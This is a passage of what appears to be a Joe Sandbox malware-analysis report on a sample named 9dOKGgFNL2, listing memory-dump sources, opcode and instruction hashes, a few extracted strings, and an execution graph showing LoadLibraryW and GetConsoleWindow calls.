                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f845fc59abe717d33d71dfeaa4f13cecd465ca4e3abcc24c102fcab203e7da02
                                                                                                                                              • Instruction ID: 8f181c38afe5122087ba1a2a07ae22c540ac3b6606734dcb45bfaf70d8e8bac5
                                                                                                                                              • Opcode Fuzzy Hash: f845fc59abe717d33d71dfeaa4f13cecd465ca4e3abcc24c102fcab203e7da02
                                                                                                                                              • Instruction Fuzzy Hash: 89E1E7B4E041598FCB14DFA9C5809AEFBB6FF89304F249169E815AB355D730AD82CF60
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 33e205980fca2e481765a70b41afd1df192b1c51c5924a48a589743baf0bbe3b
                                                                                                                                              • Instruction ID: a53dcc3cc9a676b9fc66b1795aac5a06c0456a094ccd67dc3fdf1a34c7084f97
                                                                                                                                              • Opcode Fuzzy Hash: 33e205980fca2e481765a70b41afd1df192b1c51c5924a48a589743baf0bbe3b
                                                                                                                                              • Instruction Fuzzy Hash: 46E1E7B4E041598FCB14CFA9C5849AEFBB6FF89304F249169E815AB355D730AD82CF60
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 032ea550b765ea50bf23914a32bba86b0a9e4cdb4c51c822f16392f033329b4b
                                                                                                                                              • Instruction ID: 93791d756ebfe0097a7c6505e91bac38dbd1aae4e94a0493307e67ede2163ffd
                                                                                                                                              • Opcode Fuzzy Hash: 032ea550b765ea50bf23914a32bba86b0a9e4cdb4c51c822f16392f033329b4b
                                                                                                                                              • Instruction Fuzzy Hash: EEE1F9B4E001598FCB14CFA9D5809AEFBB6FF49304F249169E815AB355D730AD82CF61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 479dab6922a50e07c69afd3e8f8c1729e53495084c719ef3ea2ea1d9fe5a05bc
                                                                                                                                              • Instruction ID: f011212525d7b1e41a5f2286b3418d56c1cd1d51236ac68822d9d1decd5c4c99
                                                                                                                                              • Opcode Fuzzy Hash: 479dab6922a50e07c69afd3e8f8c1729e53495084c719ef3ea2ea1d9fe5a05bc
                                                                                                                                              • Instruction Fuzzy Hash: 2CE107B4E001598FCB14CFA9D5809AEFBB6FF89305F249169E805AB355D730AD82CF61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6b3349ce40d7ac5e5b5cba8dc10db985000d5772f9fe2b9fc26c379f8af524e9
                                                                                                                                              • Instruction ID: d513cf7629e545e07c2d398b6ca1a7ff8d2daa2636d52573ce3e599619b0fa0b
                                                                                                                                              • Opcode Fuzzy Hash: 6b3349ce40d7ac5e5b5cba8dc10db985000d5772f9fe2b9fc26c379f8af524e9
                                                                                                                                              • Instruction Fuzzy Hash: 8BA17036E00309CFCF05DFB4C98459EB7B2FF88300B15856AEA05AB265DB71D956CB80
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fad103a1f8d30e43c68f093271330b379c87e19523896b96ceb4050907e2a71f
                                                                                                                                              • Instruction ID: 71fc6d35b6d3e6cf9e6552aa331e86b52cad6cbf2f876b0ab84bbe8e6f795738
                                                                                                                                              • Opcode Fuzzy Hash: fad103a1f8d30e43c68f093271330b379c87e19523896b96ceb4050907e2a71f
                                                                                                                                              • Instruction Fuzzy Hash: 73511CB1E042598FCB14CFAAD5805AEFBF6FF89304F24816AD418AB255D7319942CFA1

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:11.4%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:36
                                                                                                                                              Total number of Limit Nodes:2
                                                                                                                                              execution_graph 40285 67d6361 40286 67d62fc 40285->40286 40287 67d636a 40285->40287 40291 67d73f1 40286->40291 40295 67d7400 40286->40295 40288 67d631d 40292 67d738d 40291->40292 40292->40291 40293 67d7451 40292->40293 40299 67d6f98 40292->40299 40293->40288 40296 67d7448 40295->40296 40297 67d7451 40296->40297 40298 67d6f98 LoadLibraryW 40296->40298 40297->40288 40298->40297 40300 67d75f0 LoadLibraryW 40299->40300 40302 67d7665 40300->40302 40302->40293 40256 13e0871 40261 13e08d8 40256->40261 40266 13e0817 40256->40266 40272 13e08c8 40256->40272 40257 13e0889 40262 13e08fa 40261->40262 40277 13e0ce8 40262->40277 40281 13e0ce0 40262->40281 40263 13e093e 40263->40257 40268 13e081d 40266->40268 40267 13e0897 40267->40257 40268->40267 40269 13e0ce8 GetConsoleWindow 40268->40269 40270 13e0ce0 GetConsoleWindow 40268->40270 40271 13e093e 40269->40271 40270->40271 40271->40257 40273 13e08d8 40272->40273 40275 13e0ce8 GetConsoleWindow 40273->40275 40276 13e0ce0 GetConsoleWindow 40273->40276 40274 13e093e 40274->40257 40275->40274 40276->40274 40278 13e0d26 GetConsoleWindow 40277->40278 40280 13e0d56 40278->40280 40280->40263 40282 13e0d26 GetConsoleWindow 40281->40282 40284 13e0d56 40282->40284 40284->40263
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $fq
                                                                                                                                              • API String ID: 0-12477121
                                                                                                                                              • Opcode ID: de7a91d22bbd2186ef92117731f5d71a792683cd768e813999cf752a11f11586
                                                                                                                                              • Instruction ID: cd7f0f145b5b7b79851bb645292e2cf6a6cf6884fa10dc8fb3618d5827621a6b
                                                                                                                                              • Opcode Fuzzy Hash: de7a91d22bbd2186ef92117731f5d71a792683cd768e813999cf752a11f11586
                                                                                                                                              • Instruction Fuzzy Hash: 541284B4B002198FCB15DF68C4949AEBBF6FF88710B158569D906EB3A5DB30DC41CBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 197e2cc996537446768ff2594f5d852a779ac6a46bd5cec3ed69a467db40b0ee
                                                                                                                                              • Instruction ID: 12f1911a7c7923d3800f4936544d3318f65d388397f0f22e73883321f923b2d8
                                                                                                                                              • Opcode Fuzzy Hash: 197e2cc996537446768ff2594f5d852a779ac6a46bd5cec3ed69a467db40b0ee
                                                                                                                                              • Instruction Fuzzy Hash: F312A4B1A00209DFCB15DFA8D880B9EBBF2FF84300F558569E505AB2A1DB31ED45CB90
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: d
                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                              • Opcode ID: 129108a8b5ad28b58ba2e008310058e191ddc6f5cdeb5eea5eb5470b15e2768a
                                                                                                                                              • Instruction ID: 79c4896c3b537430388f3fb58bdd3ed9cd7ceec0e6ab5569263c350bc6896525
                                                                                                                                              • Opcode Fuzzy Hash: 129108a8b5ad28b58ba2e008310058e191ddc6f5cdeb5eea5eb5470b15e2768a
                                                                                                                                              • Instruction Fuzzy Hash: ECC169B57006028FC715CF19D4A096ABBF2FF89310B55C959E59A9B3A6DB30FC46CB80
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,067D74A6), ref: 067D7656
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1869234543.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_67d0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                              • Opcode ID: b10bc823b978ebc6e9baf5f4de76ccfd0188f142d9df555719abb9a7de98904b
                                                                                                                                              • Instruction ID: 87481c60ee9a7d79889ceddf7540bd8f8758747ff76cdb4fe3f42147ba890391
                                                                                                                                              • Opcode Fuzzy Hash: b10bc823b978ebc6e9baf5f4de76ccfd0188f142d9df555719abb9a7de98904b
                                                                                                                                              • Instruction Fuzzy Hash: 441126B5C002498FCB10DF9AC844ADEFBF5EF88320F14842AD429A7710D775A546CFA1
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,067D74A6), ref: 067D7656
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1869234543.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_67d0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                              • Opcode ID: 5c217153fbf4db7a5db4b6a9b28f025d484d88deb05f65c90a5cbc004fb870a1
                                                                                                                                              • Instruction ID: 74114b77a5f853f6e13ab12801a80deeb9d3dbe09fd96b6bad4e6a61a4bb1cac
                                                                                                                                              • Opcode Fuzzy Hash: 5c217153fbf4db7a5db4b6a9b28f025d484d88deb05f65c90a5cbc004fb870a1
                                                                                                                                              • Instruction Fuzzy Hash: 671112B1C002498FCB14DF9AC844A9EFBF5AB88220F14842AD429A7600E775A545CFA5
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1858719228.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_13e0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ConsoleWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2863861424-0
                                                                                                                                              • Opcode ID: b88c4dd386e16708831685177cf4144913eb45069d4938ae099f8b11db67537c
                                                                                                                                              • Instruction ID: c61f1e9ec45f47d9260931bd70a58b8f2fa5e186d2b624456ece1c70434bbe2e
                                                                                                                                              • Opcode Fuzzy Hash: b88c4dd386e16708831685177cf4144913eb45069d4938ae099f8b11db67537c
                                                                                                                                              • Instruction Fuzzy Hash: BB1134B5D003498FCB24CFAAC4497EEFBF5AB88324F24841AD519A7240C6796544CBA0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1858719228.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_13e0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ConsoleWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2863861424-0
                                                                                                                                              • Opcode ID: f62a0c78e041ae871e7f93b4ef3ca2cdb7da30a817f10f927c644ab2377a08e8
                                                                                                                                              • Instruction ID: bd2f81d8281812d1c594a97cfd0fc13ef941841d6fd3e6d9bb10b193927ca489
                                                                                                                                              • Opcode Fuzzy Hash: f62a0c78e041ae871e7f93b4ef3ca2cdb7da30a817f10f927c644ab2377a08e8
                                                                                                                                              • Instruction Fuzzy Hash: 191136B1D003498FDB24DFAAC44579FFFF5AB48324F20841AD519A7240CB79A544CBA1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ,jq
                                                                                                                                              • API String ID: 0-1538246120
                                                                                                                                              • Opcode ID: ea9c149da213a2e0fd6196bb82278849aeca205e8d458e057ec8cbc6700e2f0a
                                                                                                                                              • Instruction ID: 2f58550109ad6e1038e58794948936db66076d5cf7d7ac96f68fbef201593f4c
                                                                                                                                              • Opcode Fuzzy Hash: ea9c149da213a2e0fd6196bb82278849aeca205e8d458e057ec8cbc6700e2f0a
                                                                                                                                              • Instruction Fuzzy Hash: 5871A2747102058FC718DF39C498A2ABBE6AF89614B1584AAE606CF3F1DF70DC41DBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1869328121.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_6820000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9ceff2c967c59500336506480122d3c185e9cb273e5ecaf5a1c74d80be1f6428
                                                                                                                                              • Instruction ID: 444007334dbd1ae0b660bf1a121e5023f4c772036c1cc54545ce4760385eec0c
                                                                                                                                              • Opcode Fuzzy Hash: 9ceff2c967c59500336506480122d3c185e9cb273e5ecaf5a1c74d80be1f6428
                                                                                                                                              • Instruction Fuzzy Hash: 0FC23C74B002189FCB54DF58C891EEDBBB6FF88700F108199E645AB361DB71AE858F91
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'fq
                                                                                                                                              • API String ID: 0-2007657732
                                                                                                                                              • Opcode ID: b4ec3dc2942616b5fe0097da7e2522a67397ba6a66b3954c08511b0d573b3379
                                                                                                                                              • Instruction ID: 629d8110e2b070e2f85d848aec9a70576653cc13826ea4d93b84afc449a70f9b
                                                                                                                                              • Opcode Fuzzy Hash: b4ec3dc2942616b5fe0097da7e2522a67397ba6a66b3954c08511b0d573b3379
                                                                                                                                              • Instruction Fuzzy Hash: CF0126B12002005BC708EB78D4A0A6F7BEAEBC52807045969D0458B655EF30AC0693E1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'fq
                                                                                                                                              • API String ID: 0-2007657732
                                                                                                                                              • Opcode ID: c35b68b006405bcd9a9f6f18b833308ca90838ee1ff608a496ab443d9f3d91f5
                                                                                                                                              • Instruction ID: 95760534f33f69d1f603b98be89a926db9c4d0660666c0d3192c7688c43a61de
                                                                                                                                              • Opcode Fuzzy Hash: c35b68b006405bcd9a9f6f18b833308ca90838ee1ff608a496ab443d9f3d91f5
                                                                                                                                              • Instruction Fuzzy Hash: D8F096713002115BC61CE768D4A096F77D7FBC52503545E29D0468B754EF30AC4697E1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1869328121.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_6820000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 53b88a74bd92db3cec0e52915b89481e9e9498f6392249fb544e2420862b1bfb
                                                                                                                                              • Instruction ID: c6ab9cefb149a7f6a0ec8f1dc4ac3e85077ba3c9b1f81152b46880c9be3d40c0
                                                                                                                                              • Opcode Fuzzy Hash: 53b88a74bd92db3cec0e52915b89481e9e9498f6392249fb544e2420862b1bfb
                                                                                                                                              • Instruction Fuzzy Hash: 86A1C374B002559FCB44DFA8C8A49AEBBF2EF88700F14806AE616DB3A1DB35DC45CB51
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1869328121.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_6820000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e9c246183e9b30831e837758af5f0b6604075b50ac9afee5c1abd35bd0235e1c
                                                                                                                                              • Instruction ID: c1e17c1dcb60f4fba31dff22a8300ab904100168018ba11586ef345f6ae65721
                                                                                                                                              • Opcode Fuzzy Hash: e9c246183e9b30831e837758af5f0b6604075b50ac9afee5c1abd35bd0235e1c
                                                                                                                                              • Instruction Fuzzy Hash: 784259707406298FCB64AFA8D49096FBBB2FBC1704B004A5CD542AF795CF76ED058B86
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8c1afb94a562d5c9a902c088291debad29b7f94a6fcb2e605a8d07e677cb20bd
                                                                                                                                              • Instruction ID: e9613170617b2662bd23aa238d883adc28c059346bfcca028694e20d1934dbe5
                                                                                                                                              • Opcode Fuzzy Hash: 8c1afb94a562d5c9a902c088291debad29b7f94a6fcb2e605a8d07e677cb20bd
                                                                                                                                              • Instruction Fuzzy Hash: 6C327BB47006058FCB15DF79C494A6ABBF2FF89300B1584A9E546DB3A2DB31EC45CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1869328121.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_6820000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 731c2983917e49a3aee3af9b23c842cae59839b70e3ba6bf74a4f01b4cc0265d
                                                                                                                                              • Instruction ID: 0e60b3d551f634fa54be28b5c61166fddf4262246f5e55f6aaf51daf479f7cdf
                                                                                                                                              • Opcode Fuzzy Hash: 731c2983917e49a3aee3af9b23c842cae59839b70e3ba6bf74a4f01b4cc0265d
                                                                                                                                              • Instruction Fuzzy Hash: 08D19F70B002159FDB418F68C855AAE7BB6FF89704F14845AE641DF3A2CBB19C45CB92
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1869328121.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_6820000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c3a792f8970e5baecded88ed6a24fcd1b34e6c0947592661abe36d1aca5fee35
                                                                                                                                              • Instruction ID: 3ccad2b838151c241abf911021386b22518ebe06076a16bdf0299a58aa89aef9
                                                                                                                                              • Opcode Fuzzy Hash: c3a792f8970e5baecded88ed6a24fcd1b34e6c0947592661abe36d1aca5fee35
                                                                                                                                              • Instruction Fuzzy Hash: 2AC14734B10104AFCB449F98C899E9DB7B2FF89300F618199FA41DB761CA72EC55CB55
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8ae4aa13632a3a59dde2da3ae06e76ddf99af3dd73e67b06e269e4f946675726
                                                                                                                                              • Instruction ID: f2cdf99ceec68041433e5fb9d9d8a5b6538ea26308a595ab8f0c4fc5436518ad
                                                                                                                                              • Opcode Fuzzy Hash: 8ae4aa13632a3a59dde2da3ae06e76ddf99af3dd73e67b06e269e4f946675726
                                                                                                                                              • Instruction Fuzzy Hash: 57B15BB47006058FCB15DF79C494A6ABBF2BF89700B1540A9E546DB3A1CB30ED45DBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1869328121.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_6820000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1ad21d526d875b90ddf33fd574bdcbd41a7b82fd22368b9a38cf4c7c02e71abf
                                                                                                                                              • Instruction ID: f675a0f70556a3729f8897196dedf759b667ec474c70fc9ac4b08f3879b21a48
                                                                                                                                              • Opcode Fuzzy Hash: 1ad21d526d875b90ddf33fd574bdcbd41a7b82fd22368b9a38cf4c7c02e71abf
                                                                                                                                              • Instruction Fuzzy Hash: 43511931B003668FC7649E69988856EBBEAAFC1214B34853ADB85C7251EB30D8C1C791
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e9408a436879f8eb06e2f1f5c0ed4869f9593dd97036d2102bc82a5320a59cf2
                                                                                                                                              • Instruction ID: 2065391632741bfd5abad40c7c624618f54e6c163ff4c2aa69d9761c66f5868d
                                                                                                                                              • Opcode Fuzzy Hash: e9408a436879f8eb06e2f1f5c0ed4869f9593dd97036d2102bc82a5320a59cf2
                                                                                                                                              • Instruction Fuzzy Hash: 476175B0B006198FCB15DFA9C8906AEBBF6BF88600F158169D905EB395DB30DC41DBE0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 889d6310e99f1d5954560d6746de2a1f9b8c6132706098e45f1770aede865a11
                                                                                                                                              • Instruction ID: 4953e9e360c0da1d8cdc237af21cc9e70ace65fccfe68d1ecc44e714c113f802
                                                                                                                                              • Opcode Fuzzy Hash: 889d6310e99f1d5954560d6746de2a1f9b8c6132706098e45f1770aede865a11
                                                                                                                                              • Instruction Fuzzy Hash: 147194B0A0021A9FDB15DFA8D894A9EBBF2FF44300F058569E555BB3A1DB30ED45CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 58e02ef5e2953a5eb14cd24d841fb3822f895e3ff31cb889a4ddfcd6a3038403
                                                                                                                                              • Instruction ID: ca71db11cc15b5047c6abbeff9a548603596cfd9956ba234d5d8f67a811c0a9f
                                                                                                                                              • Opcode Fuzzy Hash: 58e02ef5e2953a5eb14cd24d841fb3822f895e3ff31cb889a4ddfcd6a3038403
                                                                                                                                              • Instruction Fuzzy Hash: 285190B1B002058FCB14DF69D88499EBBF5FF88210B1585AAE605DB362DB30EC45CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7bd6feaef20b8ab89cd63a2bd153eea7ddd8b6cbcf44fb38057c218e41100405
                                                                                                                                              • Instruction ID: 90683b3b7ee0fe1b30f311a6e322a4e4873bd48edf3febd859c70add9cc14439
                                                                                                                                              • Opcode Fuzzy Hash: 7bd6feaef20b8ab89cd63a2bd153eea7ddd8b6cbcf44fb38057c218e41100405
                                                                                                                                              • Instruction Fuzzy Hash: 6E51ADB17002059FCB16DF78E8649AABBB2FF85304B508568E946CB7D1DB31EC42CB91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2a24d15edc41cba16cb0aa82fbff885579414fd9d03849220ffc6bf3e1c69da1
